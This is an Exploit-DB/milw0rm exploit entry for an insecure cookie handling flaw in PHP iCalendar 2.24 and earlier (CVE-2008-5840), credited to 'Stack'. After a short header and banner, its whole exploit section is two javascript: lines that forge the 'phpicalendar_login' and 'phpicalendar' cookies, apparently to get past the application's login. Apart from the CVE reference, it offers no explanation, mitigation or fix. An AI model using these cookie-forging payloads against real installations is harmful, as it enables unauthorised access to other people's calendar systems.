PHP iCalendar <= 2.24 Insecure Cookie Handling Vulnerability

2008-09-22T00:00:00
ID EDB-ID:6526
Type exploitdb
Reporter Stack
Modified 2008-09-22T00:00:00

Description

PHP iCalendar <= 2.24 Insecure Cookie Handling Vulnerability. CVE-2008-5840. Webapps exploit for php platform

                                        
                                            ###############################################################################################
[+] PHP iCalendar &lt;= 2.24 Insecure Cookie Handling Vulnerability
[+] Discovered By Stack                
[+] Greetz : All my freind               
################################################################################################
---
exploit:
javascript:document.cookie = "phpicalendar_login=1; path=/";
javascript:document.cookie = "phpicalendar=1; path=/";

# milw0rm.com [2008-09-22]